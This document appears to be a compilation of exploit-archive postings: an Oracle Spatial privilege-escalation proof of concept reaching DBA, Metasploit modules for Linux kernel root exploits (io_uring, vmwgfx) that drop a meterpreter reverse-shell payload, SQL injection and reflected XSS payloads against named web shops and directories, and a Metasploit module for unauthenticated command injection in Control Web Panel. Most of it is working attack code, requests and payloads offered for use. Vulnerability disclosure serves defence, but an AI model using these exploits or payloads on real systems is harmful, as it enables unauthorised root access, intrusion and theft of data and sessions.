<pre><code>Title: Oracle Database Privilege Escalation Through Oracle Spatial Component<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 12.1.0.2<br />Tested Version(s): 12cR1<br />Risk Level: High<br />Solution Status: Fixed in Oracle Critical Patch Update October 2021<br />CVE Reference: N/A, Backported in Oracle CPU OCT 2021<br />Author of Advisory: Emad Al-Mousa<br /><br />Overview:<br /><br />Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc.<br /><br /><br />*****************************************<br />Vulnerability Details:<br /><br />The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021.<br /><br />To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system:<br /><br />SQL> select comp_name from dba_registry;<br /><br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />// I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions:<br /><br />sqlplus / as sysdba<br /><br />SQL> create user ironman identified by iron_123;<br /><br />SQL> grant create session to ironman;<br /><br />SQL> grant create any procedure to ironman;<br /><br /><br />SQL> grant execute any procedure to ironman;<br /><br />SQL> exit;<br /><br />// I will now connect using the newly created account “ironman” using sql plus<br /><br />sqlplus ironman/iron_123<br /><br />SQL> show user<br /><br />USER is “IRONMAN”<br /><br />SQL> select * from session_roles;<br /><br />no rows selected<br /><br />SQL> create or replace procedure SPATIAL_CSW_ADMIN_USR.hulk (SQL_TEXT IN VARCHAR2) as<br /><br /> BEGIN<br /><br /> EXECUTE IMMEDIATE (SQL_TEXT);<br /><br /> END hulk;<br />/<br /><br /><br />SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');<br /><br /><br />SQL> select * from session_roles;<br /><br />no rows selected<br /><br />SQL> set role DATAPUMP_IMP_FULL_DATABASE;<br /><br />// ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE<br /><br />SQL> select * from session_roles;<br /><br />ROLE<br /><br />——————————————————————————–<br /><br />DATAPUMP_IMP_FULL_DATABASE<br /><br />EXP_FULL_DATABASE<br /><br />SELECT_CATALOG_ROLE<br /><br />HS_ADMIN_SELECT_ROLE<br /><br />HS_ADMIN_ROLE<br /><br />HS_ADMIN_EXECUTE_ROLE<br /><br />EXECUTE_CATALOG_ROLE<br /><br />IMP_FULL_DATABASE<br /><br />8 rows selected.<br /><br />// the next escalation level is to DBA role !!<br /><br />SQL> grant dba to ironman;<br /><br />SQL> set role dba;<br /><br />SQL> select * from session_roles;<br /><br />ROLE<br /><br />——————————————————————————–<br /><br />DBA<br /><br />SELECT_CATALOG_ROLE<br /><br />HS_ADMIN_SELECT_ROLE<br /><br />HS_ADMIN_ROLE<br /><br />HS_ADMIN_EXECUTE_ROLE<br /><br />EXECUTE_CATALOG_ROLE<br /><br />DELETE_CATALOG_ROLE<br /><br />EXP_FULL_DATABASE<br /><br />Advertisements<br />Report this ad<br /><br />IMP_FULL_DATABASE<br /><br />DATAPUMP_EXP_FULL_DATABASE<br /><br />DATAPUMP_IMP_FULL_DATABASE<br /><br />ROLE<br /><br />——————————————————————————–<br /><br />GATHER_SYSTEM_STATISTICS<br /><br />SCHEDULER_ADMIN<br /><br />XDBADMIN<br /><br />XDB_SET_INVOKER<br /><br />JAVA_ADMIN<br /><br />JAVA_DEPLOY<br /><br />WM_ADMIN_ROLE<br /><br />CAPTURE_ADMIN<br /><br />OPTIMIZER_PROCESSING_RATE<br /><br />EM_EXPRESS_ALL<br /><br />EM_EXPRESS_BASIC<br /><br />22 rows selected.<br /><br />--- Conclusion:<br /><br />The account ironman has been successfully elevated to the “DBA” role which is the highest database role in Oracle database system.<br /><br /><br />*****************************************<br />- Defensive Techniques:<br /><br />configure auditing to catch any privilege escalation attempts.<br />review database account permissions on regular basis.<br />ensure database accounts have strong passwords, and rotate passwords regularly if possible.<br />perform VA (vulnerability assesment) scans on regular basis.<br />pro-actively patch your systems and database systems.<br /><br /><br />*****************************************<br />References:<br />https://www.oracle.com/security-alerts/cpuoct2021.html<br />https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/<br /><br />Credit: <br />Security-In-Depth Contributors: Emad Al-Mousa<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GreatRanking # https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking<br /><br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::System<br /> include Msf::Post::Linux::Kernel<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> include Msf::Post::Linux::Compile<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'io_uring Same Type Object Reuse Priv Esc',<br /> 'Description' => %q{<br /> This module exploits a bug in io_uring leading to an additional put_cred()<br /> that can be exploited to hijack credentials of other processes.<br /><br /> We spawn SUID programs to get the free'd cred object reallocated by a<br /> privileged process and abuse them to create a SUID root binary ourselves<br /> that'll pop a shell.<br /><br /> The dangling cred pointer will, however, lead to a kernel panic as soon as<br /> the task terminates and its credentials are destroyed. We therefore detach<br /> from the controlling terminal, block all signals and rest in silence until<br /> the system shuts down and we get killed hard, just to cry in vain, seeing<br /> the kernel collapse.<br /><br /> The bug affected kernels from v5.12-rc3 to v5.14-rc7.<br /><br /> More than 1 CPU is required for exploitation.<br /><br /> Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Ryota Shiga', # discovery<br /> 'Mathias Krause' # original PoC, analysis<br /> ],<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ],<br /> [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ],<br /> [ 'URl', 'https://github.com/torvalds/linux/commit/a30f895ad3239f45012e860d4f94c1a388b36d14' ],<br /> [ 'CVE', '2022-1043' ]<br /> ],<br /> 'DisclosureDate' => '2022-03-22',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',<br /> 'PrependFork' => true<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br /> ]<br /> end<br /><br /> # Simplify pulling the writable directory variable<br /> def base_dir<br /> datastore['WritableDir'].to_s<br /> end<br /><br /> def check<br /> # Check the kernel version to see if its in a vulnerable range<br /> release = kernel_release<br /> if Rex::Version.new(release.split('-').first) > Rex::Version.new('5.14-rc7') ||<br /> Rex::Version.new(release.split('-').first) < Rex::Version.new('5.12-rc3')<br /> vprint_error "Kernel version #{release} is not vulnerable"<br /> return CheckCode::Safe<br /> end<br /> vprint_good "Kernel version #{release} appears to be vulnerable"<br /><br /> # make sure we have enough CPUs. Minimum 2 required<br /> cpu = get_cpu_info<br /> if cpu[:cores] < 2<br /> CheckCode::Safe("> 1 CPU required, detected: #{cpu[:cores]}")<br /> end<br /> CheckCode::Vulnerable("> 1 CPU required, detected: #{cpu[:cores]}")<br /> end<br /><br /> def exploit<br /> # Check if we're already root<br /> if is_root? && !datastore['ForceExploit']<br /> fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'<br /> end<br /><br /> # Make sure we can write our exploit and payload to the local system<br /> unless writable? base_dir<br /> fail_with Failure::BadConfig, "#{base_dir} is not writable"<br /> end<br /><br /> # Upload exploit executable, writing to a random name so AV doesn't have too easy a job<br /> executable_name = ".#{rand_text_alphanumeric(5..10)}"<br /> executable_path = "#{base_dir}/#{executable_name}"<br /> payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> if live_compile?<br /> vprint_status 'Live compiling exploit on system...'<br /> code = strip_comments(exploit_source('CVE-2022-1043', 'cve-2022-1043.c'))<br /> upload_and_compile executable_path, code<br /> else<br /> vprint_status 'Dropping pre-compiled exploit on system...'<br /> upload_and_chmodx executable_path, exploit_data('CVE-2022-1043', 'pre_compiled')<br /> end<br /><br /> # Upload payload executable<br /> upload_and_chmodx payload_path, generate_payload_exe<br /> register_files_for_cleanup(payload_path)<br /> register_files_for_cleanup(executable_path)<br /><br /> timeout = 30<br /> print_status 'Launching exploit...'<br /> output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout<br /> output.each_line { |line| vprint_status line.chomp }<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GoodRanking<br /><br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::System<br /> include Msf::Post::Linux::Kernel<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> include Msf::Post::Linux::Compile<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'vmwgfx Driver File Descriptor Handling Priv Esc',<br /> 'Description' => %q{<br /> If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to<br /> recover by deallocating the (already populated) file descriptor. This is<br /> wrong, as the fd gets released via put_unused_fd() which shouldn't be used,<br /> as the fd table slot was already populated via the previous call to<br /> fd_install(). This leaves userland with a valid fd table entry pointing to<br /> a free'd 'file' object.<br /><br /> We use this bug to overwrite a SUID binary with our payload and gain root.<br /> Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.<br /><br /> Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Mathias Krause' # original PoC, analysis<br /> ],<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ],<br /> [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ],<br /> [ 'CVE', '2022-22942' ]<br /> ],<br /> 'DisclosureDate' => '2022-01-28',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',<br /> 'PrependFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_OS_DOWN],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> # seeing "BUG: Bad page cache in process <process> pfn:<5 characters>" on console<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ])<br /> ]<br /> end<br /><br /> def base_dir<br /> datastore['WritableDir'].to_s<br /> end<br /><br /> def check<br /> # Check the kernel version to see if its in a vulnerable range<br /> release = kernel_release<br /> unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') &&<br /> Rex::Version.new(release) < Rex::Version.new('5.17-rc1')<br /> return CheckCode::Safe("Kernel version #{release} is not vulnerable")<br /> end<br /><br /> vprint_good "Kernel version #{release} appears to be vulnerable"<br /><br /> @driver = nil<br /><br /> if writable?('/dev/dri/card0') # ubuntu, RHEL<br /> @driver = '/dev/dri/card0'<br /> elsif writable?('/dev/dri/renderD128') # debian<br /> @driver = '/dev/dri/renderD128'<br /> else<br /> return CheckCode::Safe('Unable to write to /dev/dri/card0 or /dev/dri/renderD128')<br /> end<br /> vprint_good("#{@driver} found writable")<br /><br /> @suid_target = nil<br /> if setuid?('/bin/chfn') # ubuntu<br /> @suid_target = '/bin/chfn'<br /> elsif writable?('/bin/chage') # RHEL/Centos<br /> @suid_target = '/bin/chage'<br /> else<br /> return CheckCode::Safe('/bin/chfn isn\'t SUID or /bin/chage not writable')<br /> end<br /> vprint_good("#{@suid_target} suid binary found")<br /><br /> if kernel_modules&.include?('vmwgfx')<br /> return CheckCode::Appears('vmwgfx installed')<br /> end<br /><br /> CheckCode::Safe('Vulnerable driver (vmwgfx) not found')<br /> end<br /><br /> def exploit<br /> # Check if we're already root<br /> if is_root? && !datastore['ForceExploit']<br /> fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'<br /> end<br /><br /> # Make sure we can write our exploit and payload to the local system<br /> unless writable? base_dir<br /> fail_with Failure::BadConfig, "#{base_dir} is not writable"<br /> end<br /><br /> # backup the suid binary before we overwrite it<br /> @suid_backup = read_file(@suid_target)<br /> path = store_loot(<br /> @suid_target,<br /> 'application/octet-stream',<br /> rhost,<br /> @suid_backup,<br /> @suid_target<br /> )<br /> print_good("Original #{@suid_target} backed up to #{path}")<br /> executable_name = ".#{rand_text_alphanumeric(5..10)}"<br /> executable_path = "#{base_dir}/#{executable_name}"<br /> if live_compile?<br /> vprint_status 'Live compiling exploit on system...'<br /> payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /><br /> c_code = exploit_source('CVE-2022-22942', 'cve-2022-22942-dc.c')<br /> c_code = c_code.gsub('/dev/dri/card0', @driver) # ensure the right driver device is called<br /> c_code = c_code.gsub('/bin/chfn', @suid_target) # ensure we have our suid target<br /> c_code = c_code.gsub('/proc/self/exe', payload_path) # change exe to our payload<br /><br /> upload_and_compile executable_path, strip_comments(c_code)<br /> register_files_for_cleanup(executable_path)<br /> else<br /> unless @suid_target == '/bin/chfn'<br /> fail_with(Failure::BadConfig, 'Pre-compiled is only valid against Ubuntu based systems')<br /> end<br /> vprint_status 'Dropping pre-compiled exploit on system...'<br /> payload_path = '/tmp/.aYd3GAMlK'<br /> upload_and_chmodx executable_path, exploit_data('CVE-2022-22942', 'pre_compiled')<br /> end<br /><br /> # Upload payload executable<br /> print_status("Uploading payload to #{payload_path}")<br /> upload_and_chmodx payload_path, generate_payload_exe<br /> register_files_for_cleanup(generate_payload_exe)<br /><br /> print_status 'Launching exploit...'<br /> output = cmd_exec executable_path, nil, 30<br /> output.each_line { |line| vprint_status line.chomp }<br /> end<br /><br /> def cleanup<br /> if @suid_backup.nil?<br /> print_bad("MANUAL replacement of trojaned #{@suid_target} is required.")<br /> else<br /> print_status("Replacing trojaned #{@suid_target} with original")<br /> write_file(@suid_target, @suid_backup)<br /> end<br /> super<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : mybizcms.com │<br />│ Vendor : MyBizCMS │<br />│ Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /categories/phones<br /><br />/categories/phones?min_price=2485[SQLI]&max_price=145000[SQLI]&brand[]=16&review_ratings=5&a4tech-brand[]=50[SQLI]&battery[]=44[SQLI]&storage[]=41[SQLI]&display[]=37[SQLI]&performance[]=36[SQLI]&attribute3[]=7[SQLI]<br /><br /><br />GET parameter 'min_price' is vulnerable to SQLI<br /><br />GET parameter 'max_price' is vulnerable to SQLI<br /><br />GET parameter 'a4tech-brand[]' is vulnerable to SQLI<br /><br />GET parameter 'battery[]' is vulnerable to SQLI<br /><br />GET parameter 'display[]' is vulnerable to SQLI<br /><br />GET parameter 'performance[]' is vulnerable to SQLI<br /><br />GET parameter 'attribute3[]' is vulnerable to SQLI<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : mybizcms.com │<br />│ Vendor : MyBizCMS │<br />│ Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /search<br /><br />GET parameter 'pg' is vulnerable to XSS<br /><br />/search?q=&pg=2vo1rf%3cscript%3ealert(1)%3c%2fscript%3ew6fsg<br /><br /><br />Path: /categories/phones<br /><br />GET parameter 'max_price' is vulnerable to XSS<br /><br />/categories/phones?min_price=2485&max_price=fulkc"><script>alert(1)</script>hpbwm<br /><br /><br />Path: /categories/phones<br /><br />GET parameter 'min_price' is vulnerable to XSS<br /><br />/categories/phones?min_price=2485i95td%22%3e%3cscript%3ealert(1)%3c%2fscript%3erziag<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)<br /># Date: 2023-01-02<br /># Exploit Author: Muhammad Navaid Zafar Ansari<br /># Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip<br /># Version: 1.0<br /># Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)<br /># CVE: Not Assigned Yet<br /># References: -<br /><br />------------------------------------------------------------------------------------<br /><br />1. Description:<br />----------------------<br /><br />Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.<br /><br /><br />2. Proof of Concept:<br />----------------------<br /><br />Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.<br />Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql<br /><br />SQLMap Response:<br /><br />[*] starting @ 04:49:58 /2023-02-01/<br /><br />[04:49:58] [INFO] testing connection to the target URL<br />you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n<br />sqlmap resumed the following injection point(s) from stored session:<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK<br />---<br />[04:50:00] [INFO] testing MySQL<br />[04:50:00] [INFO] confirming MySQL<br />[04:50:00] [INFO] the back-end DBMS is MySQL<br />web server operating system: Linux Debian<br />web application technology: Apache 2.4.55, PHP<br />back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)<br /><br /><br />3. Example payload:<br />----------------------<br /><br />(boolean-based)<br /><br />' AND 1=1 AND 'test'='test<br /><br /><br />4. Burpsuite request:<br />----------------------<br /><br />GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip<br />Connection: close<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/stopwatch'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'CWP login.php Unauthenticated RCE',<br /> 'Description' => %q{<br /> Control Web Panel versions < 0.9.8.1147 are vulnerable to<br /> unauthenticated OS command injection. Successful exploitation results<br /> in code execution as the root user. The results of the command are not<br /> contained within the HTTP response and the request will block while<br /> the command is running.<br /> },<br /> 'Author' => [<br /> 'Spencer McIntyre', # metasploit module<br /> 'Numan Türle' # vulnerability discovery<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2022-44877' ],<br /> [ 'URL', 'https://github.com/numanturle/CVE-2022-44877' ],<br /> [ 'URL', 'https://control-webpanel.com/changelog#1674073133745-84af1b53-c121' ]<br /> ],<br /> 'DisclosureDate' => '2023-01-05',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> Opt::RPORT(2031),<br /> OptString.new('TARGETURI', [true, 'Base path', '/login/index.php'])<br /> ])<br /> end<br /><br /> def check<br /> sleep_time = rand(5..10)<br /><br /> _, elapsed_time = Rex::Stopwatch.elapsed_time do<br /> execute_command("sleep #{sleep_time}")<br /> end<br /><br /> vprint_status("Elapsed time: #{elapsed_time} seconds")<br /><br /> unless elapsed_time > sleep_time<br /> return CheckCode::Safe('Failed to test command injection.')<br /> end<br /><br /> CheckCode::Appears('Successfully tested command injection.')<br /> rescue Msf::Exploit::Failed<br /> return CheckCode::Safe('Failed to test command injection.')<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> case target['Type']<br /> when :unix_cmd<br /> if execute_command(payload.encoded)<br /> print_good("Successfully executed command: #{payload.encoded}")<br /> end<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status("Executing command: #{cmd}")<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path) + "?login=$(echo${IFS}#{Rex::Text.encode_base64(cmd)}|base64${IFS}-d|bash)",<br /> 'vars_post' => {<br /> 'username' => 'root', # *must* be root<br /> 'password' => rand_text_alphanumeric(4..16),<br /> 'commit' => 'Login'<br /> }<br /> )<br /><br /> # the command will either cause the response to timeout or return a 302<br /> return if res.nil?<br /> return if res.code == 302 && res.headers['Location'].include?('login=failed')<br /><br /> fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}")<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Business Directory Script 3.2 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /preview.php/<br /><br />URL parameter vulnerable to XSS<br /><br />/preview.php/[XSS]?controller=pjListings&action=pjActionAccount<br /><br />GET parameter 'keyword' vulnerable to XSS<br /><br />/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&keyword=[XSS]<br /><br /><br /><br />[-] Done<br /></code></pre>
